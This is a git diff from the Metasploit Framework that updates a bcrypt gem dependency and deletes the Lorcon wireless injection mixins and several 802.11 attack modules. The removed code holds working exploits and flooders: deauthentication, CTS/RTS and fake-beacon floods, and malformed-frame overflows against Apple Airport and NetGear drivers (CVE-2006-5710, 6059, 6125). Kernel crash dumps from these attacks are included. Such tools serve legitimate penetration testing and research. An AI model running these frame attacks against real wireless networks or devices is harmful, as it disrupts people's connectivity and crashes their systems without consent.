diff --git a/Gemfile b/Gemfile
index 4b6fad4025..c6f821cd4c 100755
--- a/Gemfile
+++ b/Gemfile
@@ -3,7 +3,7 @@ source 'https://rubygems.org'
 # Need 3+ for ActiveSupport::Concern
 gem 'activesupport', '>= 3.0.0'
 # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
-gem 'bcrypt-ruby'
+gem 'bcrypt'
 # Needed for some admin modules (scrutinizer_add_user.rb)
 gem 'json'
 # Needed by msfgui and other rpc components
diff --git a/Gemfile.lock b/Gemfile.lock
index 6bc1f62dac..379ea1cb81 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -13,7 +13,7 @@ GEM
 i18n (~> 0.6, >= 0.6.4)
 multi_json (~> 1.0)
 arel (3.0.2)
- bcrypt-ruby (3.1.2)
+ bcrypt (3.1.7)
 builder (3.0.4)
 database_cleaner (1.1.1)
 diff-lcs (1.2.4)
@@ -63,7 +63,7 @@ PLATFORMS
 DEPENDENCIES
 activerecord
 activesupport (>= 3.0.0)
- bcrypt-ruby
+ bcrypt
 database_cleaner
 factory_girl (>= 4.1.0)
 fivemat (= 1.2.1)
diff --git a/LICENSE b/LICENSE
index eb9c447f67..ea38924130 100644
--- a/LICENSE
+++ b/LICENSE
@@ -176,7 +176,7 @@ Files: arel
 Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
 License: MIT
-Files: bcrypt-ruby
+Files: bcrypt
 Copyright: 2007-2011 Coda Hale
 License: MIT
diff --git a/lib/msf/core/exploit/lorcon.rb b/lib/msf/core/exploit/lorcon.rb
deleted file mode 100644
index 8f2f2562a2..0000000000
--- a/lib/msf/core/exploit/lorcon.rb
+++ /dev/null
@@ -1,127 +0,0 @@
-# -*- coding: binary -*-
-module Msf
-
-###
-#
-# This module provides methods for sending raw 802.11 frames using the ruby-lorcon extension.
-# Please see the ruby-lorcon documentation for more information.
-#
-###
-
-module Exploit::Lorcon
-
- #
- # Initializes an instance of an exploit module that accesses a 802.11 network
- #
- def initialize(info = {})
- super
-
-
- default_intf = 'ath0'
- default_driver = 'madwifing'
-
-
- if (Rex::Compat.is_windows())
- # Default to the the first airpcap device on Windows
- default_intf = "\\\\.\\airpcap00"
-
- # Default to the airpcap driver on Windows
- default_driver = 'airpcap'
- end
-
- register_options(
- [
- OptString.new('INTERFACE', [true, 'The name of the wireless interface', default_intf]),
- OptString.new('DRIVER', [true, 'The name of the wireless driver for lorcon', default_driver]),
- OptInt.new('CHANNEL', [true, 'The default channel number', 11]),
- OptInt.new('TXRATE', [true, 'The injected transmit rate', 2]),
- OptEnum.new('TXMOD', [true, 'The injected modulation type', 'DSSS', %w{DEFAULT FHSS DSSS OFDM TURBO MIMO MIMOGF}])
- ], Msf::Exploit::Lorcon
- )
-
-
- begin
-
- if(Rex::Compat.is_windows())
- airpcap = Rex::FileUtils.find_full_path("airpcap.dll")
- if (not airpcap)
- raise RuntimeError, "The airpcap.dll library must be installed"
- end
- end
-
- require 'Lorcon'
- @lorcon_loaded = true
-
- rescue ::Exception => e
- @lorcon_loaded = false
- @lorcon_error = e
- end
-
- end
-
- #
- # Opens a handle to the specified wireless device
- #
- def open_wifi
-
- if (not @lorcon_loaded)
- print_status("The Lorcon module is not available: #{@lorcon_error}")
- raise RuntimeError, "Lorcon not available"
- end
-
- # XXX: Force the interface to be up
- system("ifconfig", datastore['INTERFACE'], "up")
-
- self.wifi = ::Lorcon::Device.new(datastore['INTERFACE'], datastore['DRIVER'])
- if (not self.wifi)
- raise RuntimeError, "Could not open the wireless device interface"
- end
-
- # Configure the card for reliable injection
- self.wifi.fmode = "INJECT"
- self.wifi.channel = (datastore['CHANNEL'] || 11).to_i
-
-
- # Configure modulation
- begin
- self.wifi.modulation = datastore['TXMOD']
- rescue ::ArgumentError => e
- print_status("Warning: #{e}")
- end
-
- # Configure the transmission rate
- begin
- self.wifi.txrate = datastore['TXRATE'].to_i if datastore['TXRATE']
- rescue ::ArgumentError => e
- print_status("Warning: #{e}")
- end
-
- self.wifi
- end
-
- def close_wifi
- self.wifi = nil
- end
-
- #
- # Converts ethernet addresses to binary
- #
- def eton(addr)
- addr.split(':').map { |c| c.hex.chr }.join
- end
-
- def channel
- self.wifi.channel
- end
-
- def next_channel
- cur = self.wifi.channel
- nxt = (cur > 10) ? 1 : cur + 1
- self.wifi.channel = nxt
- end
-
- attr_accessor :wifi
-
-end
-
-end
diff --git a/lib/msf/core/exploit/lorcon2.rb b/lib/msf/core/exploit/lorcon2.rb
deleted file mode 100644
index 6d9622ee54..0000000000
--- a/lib/msf/core/exploit/lorcon2.rb
+++ /dev/null
@@ -1,141 +0,0 @@
-# -*- coding: binary -*-
-module Msf
-
-###
-#
-# This module provides methods for sending raw 802.11 frames using the
-# ruby-lorco2n extension.
-# Please see the ruby-lorcon documentation for more information.
-#
-###
-
-module Exploit::Lorcon2
-
- #
- # Initializes an instance of an exploit module that accesses a 802.11 network
- #
-
- def initialize(info = {})
- super
-
- default_intf = 'wlan0'
- default_driver = 'autodetect'
-
- if (Rex::Compat.is_windows())
- # Default to the the first airpcap device on Windows
- default_intf = "\\\\.\\airpcap00"
-
- # Default to the airpcap driver on Windows
- default_driver = 'airpcap'
- end
-
- register_options(
- [
- OptString.new('INTERFACE', [true, 'The name of the wireless interface', default_intf]),
- OptString.new('DRIVER', [true, 'The name of the wireless driver for lorcon', default_driver]),
- OptInt.new('CHANNEL', [true, 'The initial channel', 11]),
- ], Msf::Exploit::Lorcon2
- )
-
-
- begin
-
- if(Rex::Compat.is_windows())
- airpcap = Rex::FileUtils.find_full_path("airpcap.dll")
- if (not airpcap)
- raise RuntimeError, "The airpcap.dll library must be installed"
- end
- end
-
- require 'Lorcon2'
- @lorcon_loaded = true
-
- rescue ::Exception => e
- @lorcon_loaded = false
- @lorcon_error = e
- end
-
- end
-
- #
- # Opens a handle to the specified wireless device
- #
- def open_wifi
-
- if (not @lorcon_loaded)
- print_status("The Lorcon2 module is not available: #{@lorcon_error}")
- raise RuntimeError, "Lorcon2 not available"
- end
-
- if (datastore['DRIVER'] == "autodetect")
- self.wifi = ::Lorcon::Device.new(datastore['INTERFACE'])
- else
- self.wifi = ::Lorcon::Device.new(datastore['INTERFACE'], datastore['DRIVER'])
- end
-
- if (not self.wifi)
- raise RuntimeError, "Could not initialize the wireless device interface"
- end
-
- # Configure for injmon
- self.wifi.openinjmon() or raise RuntimeError, "Could not open device in inject/monitor combo mode: " + self.wifi.error
-
- # Configure channel
- self.wifi.channel = datastore['CHANNEL']
-
- # TODO - add mod/rate once lorcon2 supports it
-
- self.wifi
- end
-
- #
- # This monstrosity works around a series of bugs in the interrupt
- # signal handling of Ruby 1.9 and Lorcon2
- #
- def each_packet(count=-1)
- return if not wifi
- begin
- @wifi_count = 0
- reader = framework.threads.spawn("Lorcon2Receiver", false) do
- wifi.each_packet(count.to_i) do |pkt|
- yield(pkt)
- @wifi_count += 1
- end
- end
- reader.join
- rescue ::Exception
- raise $!
- ensure
- reader.kill if reader.alive?
- end
-
- @wifi_count
- end
-
- def close_wifi
- self.wifi = nil
- end
-
- #
- # Converts ethernet addresses to binary
- #
- def eton(addr)
- addr.split(':').map { |c| c.hex.chr }.join
- end
-
- def channel
- self.wifi.channel
- end
-
- def next_channel
- cur = self.wifi.channel
- nxt = (cur > 10) ? 1 : cur + 1
- self.wifi.channel = nxt
- end
-
- attr_accessor :wifi
-
-end
-
-end
-
diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb
index d8310d238d..995d8d9ad2 100644
--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -71,8 +71,6 @@ require 'msf/core/exploit/dialup'
 require 'msf/core/exploit/dect_coa'
 # Networks
-require 'msf/core/exploit/lorcon'
-require 'msf/core/exploit/lorcon2'
 require 'msf/core/exploit/capture'
 # FileFormat
diff --git a/modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb b/modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb
deleted file mode 100644
index ee34dcef12..0000000000
--- a/modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb
+++ /dev/null
@@ -1,162 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - - -require 'msf/core' - - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Lorcon2 - include Msf::Auxiliary::Dos - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Apple Airport 802.11 Probe Response Kernel Memory Corruption', - 'Description' => %q{ - The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs) - is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning - mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading - to arbitrary code execution. This vulnerability is triggered when a probe response frame is received - that does not contain valid information element (IE) fields after the fixed-length header. The data - following the fixed-length header is copied over internal kernel structures, resulting in memory - operations being performed on attacker-controlled pointer values. 
- }, - - 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'References' => - [ - ['CVE', '2006-5710'], - ['OSVDB', '30180'], - ] - )) - register_options( - [ - OptInt.new('COUNT', [ true, "The number of frames to send", 2000]), - OptString.new('ADDR_DST', [ true, "The MAC address of the target system"]) - ], self.class) - end - - # - # This bug is easiest to trigger when the card has been placed into active scan mode: - # $ /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s -r 10000 - # - - def run - open_wifi - - cnt = datastore['COUNT'].to_i - - print_status("Creating malicious probe response frame...") - frame = create_frame() - - print_status("Sending #{cnt} frames...") - cnt.times { wifi.write(frame) } - end - - def create_frame - bssid = Rex::Text.rand_text(6) - seq = [rand(255)].pack('n') - caps = [rand(65535)].pack('n') - - frame = - "\x50" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - bssid + # src - bssid + # bssid - seq + # seq - Rex::Text.rand_text(8) + # timestamp value - Rex::Text.rand_text(2) + # beacon interval - Rex::Text.rand_text(2) # capabilities - - frame << [0x0defaced].pack('N') * ((1024-frame.length) / 4) - - return frame - - end -end - -=begin - -Tested on a 1.0Ghz PowerBook running 10.4.8 with the latest updates (Halloween, 2006) - -Unresolved kernel trap(cpu 0): 0x300 - Data access DAR=0x000000000DEFACF7 PC=0x00000000007A2260 -Latest crash info for cpu 0: - Exception state (sv=0x3AA12A00) - PC=0x007A2260; MSR=0x00009030; DAR=0x0DEFACF7; DSISR=0x40000000; LR=0x007A1D48; R1=0x17443B60; XCP=0x0000000C (0x300 - Data access) - Backtrace: 0x01BC80AC 0x007A1D48 0x0079FA54 0x0079FF94 0x0079FEBC 0x002D0B94 0x002CFA5C 0x000A9314 - Kernel loadable modules in backtrace (with dependencies): - com.apple.driver.AppleAirPort(3.4.4)@0x797000 - dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x5f8000 -Proceeding back via exception chain: - Exception state 
(sv=0x3AA12A00) - previously dumped as "Latest" state. skipping... - Exception state (sv=0x31F13A00) - PC=0x00000000; MSR=0x0000D030; DAR=0x00000000; DSISR=0x00000000; LR=0x00000000; R1=0x00000000; XCP=0x00000000 (Unknown) - -Kernel version: -Darwin Kernel Version 8.8.0: Fri Sep 8 17:18:57 PDT 2006; root:xnu-792.12.6.obj~1/RELEASE_PPC - - - -(gdb) showcurrentstacks -task vm_map ipc_space #acts pid proc command -0x01a73dd8 0x00cdaf3c 0x01a68ef0 38 0 0x003fb200 kernel_task -activation thread pri state wait_queue wait_event -0x01a7c000 0x01a7c000 82 R -reserved_stack=0x173b0000 -kernel_stack=0x17440000 -stacktop=0x17443b60 -0x17443b60 0x1bc80ac -0x17443be0 0x7a1d48 -0x17443c60 0x79fa54 -0x17443ce0 0x79ff94 -0x17443d90 0x79febc -0x17443df0 0x2d0b94 <_ZN22IOInterruptEventSource12checkForWorkEv+184> -0x17443e40 0x2cfa5c <_ZN10IOWorkLoop10threadMainEv+104> -0x17443e90 0xa9314 -stackbottom=0x17443e90 - - -(gdb) x/3i $pc -0x7a2260 : lbz r8,0(r2) -0x7a2264 : addi r2,r2,1 -0x7a2268 : stw r2,0(r11) - -(gdb) i r $r2 -r2 0xdefacf7 233811191 - -(gdb) x/x $r11 -0x17443bb8: 0x0defacf7 - - -(gdb) bt -#0 0x007a2260 in mhp.1762 () -#1 0x007a1d48 in mhp.1762 () -warning: Previous frame identical to this frame (corrupt stack?) 
-#2 0x007a1d48 in mhp.1762 () -#3 0x0079fa54 in mhp.1762 () -#4 0x0079ff94 in mhp.1762 () -#5 0x0079febc in mhp.1762 () -#6 0x002d0b94 in IOInterruptEventSource::checkForWork (this=0x1d80d40) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOInterruptEventSource.cpp:196 -#7 0x002cfa5c in IOWorkLoop::threadMain (this=0x1d803c0) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOWorkLoop.cpp:267 - - -(gdb) x/40x $r1 -0x17443b60: 0x17443be0 0x22424022 0x01bc80ac 0x00000038 -0x17443b70: 0x00d43c54 0x0004ffff 0x01bc81f4 0x00000210 -0x17443b80: 0x02275000 0x003d8000 0x004fa418 0x00365000 -0x17443b90: 0x01d803c0 0x00033e88 0x01a7c01c 0x01a7c0a4 -0x17443ba0: 0x0defaced 0x01bc8000 0x0227581e 0x0defacf7 -0x17443bb0: 0x00000000 0x0227581e 0x0defacf7 0x00000001 -0x17443bc0: 0x00000002 0x01bc81f4 0x00000000 0x00000000 -0x17443bd0: 0x17443c10 0x01a858c0 0x17443be0 0x01d80d40 -0x17443be0: 0x17443c60 0x01bc81f4 0x007a1d48 0x00000000 -0x17443bf0: 0x17443c20 0x00008088 0x01bc8000 0x0227581e - -=end diff --git a/modules/auxiliary/dos/wifi/cts_rts_flood.rb b/modules/auxiliary/dos/wifi/cts_rts_flood.rb deleted file mode 100644 index 4379dce61a..0000000000 --- a/modules/auxiliary/dos/wifi/cts_rts_flood.rb +++ /dev/null 
@@ -1,78 +0,0 @@
-##
-# This module requires Metasploit: http//metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Auxiliary
-
- include Msf::Exploit::Lorcon2
- include Msf::Auxiliary::Dos
-
- def initialize(info ={})
- super(update_info(info,
- 'Name' => 'Wireless CTS/RTS Flooder',
- 'Description' => %q{
- This module sends 802.11 CTS/RTS requests to a specific wireless peer,
- using the specified source address,
- },
- 'Author' => [ 'Brad Antoniewicz' ],
- 'License' => MSF_LICENSE
- ))
-
- register_options(
- [
- OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]),
- OptString.new('ADDR_SRC',[false, "Source MAC (not needed for CTS)"]),
- OptString.new('TYPE',[true,"Type of Frame (RTS, CTS)",'RTS']),
- OptInt.new('NUM',[true, "Number of frames to send",100])
- ],self.class)
- end
-
- def run
- case datastore['TYPE'].upcase
- when 'RTS'
- if (!datastore['ADDR_SRC'])
- print_error("FAILED: RTS Flood selected but ADDR_SRC not set!")
- return
- end
- frame = create_rts()
- when 'CTS'
-
- frame = create_cts()
- else
- print_error("No TYPE selected!!")
- return
- end
-
- open_wifi
- print_status("Sending #{datastore['NUM']} #{datastore['TYPE'].upcase} frames.....")
-
- datastore['NUM'].to_i.times do
- wifi.write(frame)
- end
-
- end
- def create_rts
-
- frame =
- "\xb4" + # Type/SubType
- "\x00" + # Flags
- "\xff\x7f" + # Duration
- eton(datastore['ADDR_DST']) + # dst addr
- eton(datastore['ADDR_SRC']) # src addr
-
- return frame
- end
- def create_cts
-
- frame =
- "\xc4" + # Type/SubType
- "\x00" + # Flags
- "\xff\x7f" + # Duration
- eton(datastore['ADDR_DST']) # dst addr
-
- return frame
- end
-end
diff --git a/modules/auxiliary/dos/wifi/deauth.rb b/modules/auxiliary/dos/wifi/deauth.rb
deleted file mode 100644
index d1ccfe0229..0000000000
--- a/modules/auxiliary/dos/wifi/deauth.rb
+++ /dev/null
@@ -1,65 +0,0 @@
-##
-# This module requires Metasploit: http//metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Auxiliary
-
- include Msf::Exploit::Lorcon2
- include Msf::Auxiliary::Dos
-
- def initialize(info ={})
- super(update_info(info,
- 'Name' => 'Wireless DEAUTH Flooder',
- 'Description' => %q{
- This module sends 802.11 DEAUTH requests to a specific wireless peer,
- using the specified source address and source BSSID.
- },
-
- 'Author' => [ 'Brad Antoniewicz' ],
- 'License' => MSF_LICENSE
- ))
-
- register_options(
- [
- OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]),
- OptString.new('ADDR_SRC',[true, "Source MAC (e.g 00:DE:AD:BE:EF:00)"]),
- OptString.new('ADDR_BSS',[true, "BSSID (e.g 00:DE:AD:BE:EF:00)"]),
- OptInt.new('NUM',[true, "Number of frames to send",100])
- ],self.class)
- end
-
- def run
-
- print_status("Creating Deauth frame with the following attributes:")
- print_status("\tDST: #{datastore['ADDR_DST']}")
- print_status("\tSRC: #{datastore['ADDR_SRC']}")
- print_status("\tBSSID: #{datastore['ADDR_BSS']}")
-
- open_wifi
-
- print_status("Sending #{datastore['NUM']} frames.....")
-
- datastore['NUM'].to_i.times do
- wifi.write(create_deauth())
- end
- close_wifi
- end
-
- def create_deauth
-
- seq = [rand(255)].pack('n')
- frame =
- "\xc0" + # Type/SubType
- "\x00" + # Flags
- "\x3a\x01" + # Duration
- eton(datastore['ADDR_DST']) + # dst addr
- eton(datastore['ADDR_SRC']) + # src addr
- eton(datastore['ADDR_BSS']) + # BSSID
- seq + # sequence number
- "\x07\x00" # Reason Code (nonassoc. sta)
- return frame
- end
-end
diff --git a/modules/auxiliary/dos/wifi/fakeap.rb b/modules/auxiliary/dos/wifi/fakeap.rb
deleted file mode 100644
index d0d489a4d3..0000000000
--- a/modules/auxiliary/dos/wifi/fakeap.rb
+++ /dev/null
@@ -1,90 +0,0 @@
-##
-# This module requires Metasploit: http//metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-
-require 'msf/core'
-
-
-class Metasploit3 < Msf::Auxiliary
-
- include Msf::Exploit::Lorcon2
- include Msf::Auxiliary::Dos
-
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Wireless Fake Access Point Beacon Flood',
- 'Description' => %q{
- This module can advertise thousands of fake access
- points, using random SSIDs and BSSID addresses. Inspired
- by Black Alchemy's fakeap tool.
- },
-
- 'Author' => [ 'hdm', 'kris katterjohn' ],
- 'License' => MSF_LICENSE
- ))
-
- register_options([
- OptInt.new('NUM', [false, "Number of beacons to send"]),
- OptString.new('BSSID', [false, "Use this static BSSID (e.g. AA:BB:CC:DD:EE:FF)"]),
- OptString.new('SSID', [false, "Use this static SSID"])
- ])
- end
-
- def run
- open_wifi
- print_status("Sending fake beacon frames...")
- if datastore['NUM'].nil? or datastore['NUM'] == 0
- wifi.write(create_frame()) while true
- else
- datastore['NUM'].times { wifi.write(create_frame()) }
- end
- end
-
- def create_frame
-
- ssid = datastore['SSID'] || Rex::Text.rand_text_alpha(rand(31)+1)
- if datastore['BSSID']
- bssid = eton(datastore['BSSID'])
- else
- bssid = Rex::Text.rand_text(6)
- end
- seq = [rand(255)].pack('n')
-
- "\x80" + # type/subtype
- "\x00" + # flags
- "\x00\x00" + # duration
- "\xff\xff\xff\xff\xff\xff" + # dst
- bssid + # src
- bssid + # bssid
- seq + # seq
- Rex::Text.rand_text(8) + # timestamp value
- "\x64\x00" + # beacon interval
- "\x00\x05" + # capability flags
-
- # ssid tag
- "\x00" + ssid.length.chr + ssid +
-
- # supported rates
- "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
-
- # current channel
- "\x03" + "\x01" + datastore['CHANNEL'].to_i.chr +
-
- # traffic indication map
- "\x05" + "\x04" + "\x00\x01\x02\x20" +
-
- # country information
- "\x07" + "\x06" + "\x55\x53\x20\x01\x0b\x12" +
-
- # erp information
- "\x2a" + "\x01" + "\x00" +
-
- # extended supported rates
- "\x32" + "\x04" + "\x12\x24\x60\x6c"
-
- end
-
-end
diff --git a/modules/auxiliary/dos/wifi/file2air.rb b/modules/auxiliary/dos/wifi/file2air.rb
deleted file mode 100644
index 36cf74d999..0000000000
--- a/modules/auxiliary/dos/wifi/file2air.rb
+++ /dev/null
@@ -1,110 +0,0 @@
-##
-# This module requires Metasploit: http//metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Auxiliary
-
- include Msf::Exploit::Lorcon2
- include Msf::Auxiliary::Dos
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Wireless Frame (File) Injector',
- 'Description' => %q{
- Inspired by Josh Wright's file2air, this module writes
- wireless frames from a binary file to the air, allowing
- you to substitute some addresses before it gets sent.
- Unlike the original file2air (currently v1.1), this module
- *does* take into account the ToDS and FromDS flags in the
- frame when replacing any specified addresses.
- },
- # 11/03/2008
- 'Author' => 'kris katterjohn',
- 'License' => MSF_LICENSE
- ))
-
- register_options([
- OptString.new('FILE', [true, 'Filename to write to the air']),
- OptString.new('ADDR_DST', [false, 'Target MAC (e.g. 00:DE:AD:BE:EF:00)']),
- OptString.new('ADDR_SRC', [false, 'Source MAC (e.g. 00:DE:AD:BE:EF:00)']),
- OptString.new('BSSID', [false, 'BSSID (e.g. 00:DE:AD:BE:EF:00)']),
- OptInt.new('NUM', [true, 'Number of frames to send', 1])
- ], self.class)
- end
-
- def run
- begin
- frame = File.read(datastore['FILE'])
- rescue ::Exception
- print_status("Couldn't read from \"#{datastore['FILE']}\": #{$!}")
- return
- end
-
- # Sending too much data can cause local problems, even if it's
- # less than the 802.11 MTU. Gotta draw the line somewhere.
- if frame.length < 10 or frame.length > 1800
- print_status("Invalid frame size (should be 10-1800 bytes)")
- return
- end
-
- if datastore['BSSID'] or datastore['ADDR_DST'] or datastore['ADDR_SRC']
- if not substaddrs(frame)
- print_status("This module doesn't support modifying frames with both ToDS and FromDS set")
- return
- end
- end
-
- open_wifi
-
- print_status("Writing out #{datastore['NUM']} frames...")
-
- datastore['NUM'].times do
- wifi.write(frame)
- end
-
- close_wifi
- end
-
- def substaddrs(frame)
- tods = (frame[1] & 1) == 1
- fromds = (frame[1] & 2) == 2
-
- if tods
- if fromds
- # Not going to handle this 4-address special-case
- return nil
- else
- substaddr1(frame, datastore['BSSID'])
- substaddr2(frame, datastore['ADDR_SRC'])
- substaddr3(frame, datastore['ADDR_DST'])
- end
- else
- if fromds
- substaddr1(frame, datastore['ADDR_DST'])
- substaddr2(frame, datastore['BSSID'])
- substaddr3(frame, datastore['ADDR_SRC'])
- else
- substaddr1(frame, datastore['ADDR_DST'])
- substaddr2(frame, datastore['ADDR_SRC'])
- substaddr3(frame, datastore['BSSID'])
- end
- end
-
- true
- end
-
- def substaddr1(frame, addr)
- frame[4,6] = eton(addr) if addr
- end
-
- def substaddr2(frame, addr)
- frame[10,6] = eton(addr) if addr
- end
-
- def substaddr3(frame, addr)
- frame[16,6] = eton(addr) if addr
- end
-end
diff --git a/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb b/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb
deleted file mode 100644
index 3a860c5929..0000000000
--- a/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb
+++ /dev/null
@@ -1,118 +0,0 @@
-##
-# This module requires Metasploit: http//metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Auxiliary
-
- include Msf::Exploit::Lorcon2
- include Msf::Auxiliary::Dos
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'NetGear MA521 Wireless Driver Long Rates Overflow',
- 'Description' => %q{
- This module exploits a buffer overflow in the NetGear MA521 wireless device
- driver under Windows XP. When a specific malformed frame (beacon or probe response)
- is received by the wireless interface under active scanning mode, the MA521nd5.SYS
- driver attempts to write to an attacker-controlled memory location. The vulnerability
- is triggered by an invalid supported rates information element.
-
- This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a
- NetGear MA521 Cardbus adapter. A remote code execution module is also in development.
-
- This module depends on the Lorcon2 library and only works on the Linux platform
- with a supported wireless card. Please see the Ruby Lorcon2 documentation
- (external/ruby-lorcon/README) for more information.
- },
- 'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- ['CVE', '2006-6059'],
- ['OSVDB', '30507'],
- ['URL', 'http://projects.info-pull.com/mokb/MOKB-18-11-2006.html'],
- ['URL', 'ftp://downloads.netgear.com/files/ma521_1_2.zip']
- ]
- ))
- register_options(
- [
- OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]),
- OptString.new('ADDR_DST', [ true, "The MAC address of the target system", 'FF:FF:FF:FF:FF:FF'])
- ], self.class)
- end
-
- def run
-
- open_wifi
-
- stime = Time.now.to_i
- rtime = datastore['RUNTIME'].to_i
- count = 0
-
- print_status("Creating malicious beacon frame...")
-
- frame = create_beacon()
-
- print_status("Sending malicious beacon frames for #{datastore['RUNTIME']} seconds...")
-
- while (stime + rtime > Time.now.to_i)
- wifi.write(frame)
- select(nil, nil, nil, 0.10) if (count % 100 == 0)
- count += 1
- end
-
- print_status("Completed sending #{count} beacons.")
- end
-
- def create_beacon
- ssid = Rex::Text.rand_text(6)
- bssid = Rex::Text.rand_text(6)
- seq = [rand(255)].pack('n')
-
- frame =
- "\x80" + # type/subtype
- "\x00" + # flags
- "\x00\x00" + # duration
- eton(datastore['ADDR_DST']) + # dst
- bssid + # src
- bssid + # bssid
- seq + # seq
- Rex::Text.rand_text(8) + # timestamp value
- "\x64\x00" + # beacon interval
- "\x01\x00" + # capabilities
-
- # ssid IE
- "\x00" + ssid.length.chr + ssid +
-
- # supported rates IE overflow
- "\x01" + "\xFF" + ("\x41" * 255) +
-
- # channel IE
- "\x03" + "\x01" + channel.chr
-
- return frame
-
- end
-end
-
-=begin
-*******************************************************************************
-* *
-* Bugcheck Analysis *
-* *
-*******************************************************************************
-
-DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1)
-An attempt was made to access a pageable (or completely invalid) address at an
-interrupt request level (IRQL) that is too high. This is usually
-caused by drivers using improper addresses.
-If kernel debugger is available get stack backtrace.
-Arguments:
-Arg1: 41414141, memory referenced
-Arg2: 00000002, IRQL
-Arg3: 00000000, value 0 = read operation, 1 = write operation
-Arg4: aa1ec75a, address which referenced memory
-=end
diff --git a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb b/modules/auxiliary/dos/wifi/netgear_wg311pci.rb
deleted file mode 100644
index f84b60c261..0000000000
--- a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb
+++ /dev/null
@@ -1,116 +0,0 @@
-##
-# This module requires Metasploit: http//metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Auxiliary
-
- include Msf::Exploit::Lorcon2
- include Msf::Auxiliary::Dos
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'NetGear WG311v1 Wireless Driver Long SSID Overflow',
- 'Description' => %q{
- This module exploits a buffer overflow in the NetGear WG311v1 wireless device
- driver under Windows XP and 2000. A kernel-mode heap overflow occurs
- when malformed probe response frame is received that contains a long SSID field
-
- This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a
- NetGear WG311v1 PCI card. A remote code execution module is also in development.
-
- This module depends on the Lorcon2 library and only works on the Linux platform
- with a supported wireless card. Please see the Ruby Lorcon2 documentation
- (external/ruby-lorcon/README) for more information.
- },
- 'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- ['CVE', '2006-6125'],
- ['OSVDB', '30511'],
- ['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'],
- ['URL', 'ftp://downloads.netgear.com/files/wg311_1_3.zip'],
- ]
- ))
- register_options(
- [
- OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]),
- OptString.new('ADDR_DST', [ true, "The MAC address of the target system"])
- ], self.class)
- end
-
- def run
-
- open_wifi
-
- stime = Time.now.to_i
- rtime = datastore['RUNTIME'].to_i
- count = 0
-
- print_status("Creating malicious probe response frame...")
-
- frame = create_probe_response()
-
- print_status("Sending malicious probe response frames for #{datastore['RUNTIME']} seconds...")
-
- while (stime + rtime > Time.now.to_i)
- wifi.write(frame)
- select(nil, nil, nil, 0.10) if (count % 100 == 0)
- count += 1
- end
-
- print_status("Completed sending #{count} probe responses.")
- end
-
- def create_probe_response
- bssid = Rex::Text.rand_text(6)
- seq = [rand(255)].pack('n')
-
- frame =
- "\x50" + # type/subtype
- "\x00" + # flags
- "\x00\x00" + # duration
- eton(datastore['ADDR_DST']) + # dst
- bssid + # src
- bssid + # bssid
- seq + # seq
- Rex::Text.rand_text(8) + # timestamp value
- "\x64\x00" + # beacon interval
- "\x01\x00" + # capabilities
-
- # SSID IE overflow
- "\x00" + "\xff" + ("\x41" * 255) +
-
- # supported rates IE
- "\x01" + "\x08" + "\x02\x04\x0b\x16\x0c\x18\x30\x48" +
-
- # channel IE
- "\x03" + "\x01" + channel.chr
-
- return frame
-
- end
-end
-
-=begin
-*******************************************************************************
-* *
-* Bugcheck Analysis *
-* *
-*******************************************************************************
-
-BAD_POOL_HEADER (19)
-The pool is already corrupt at the time of the current request.
-This may or may not be due to the caller.
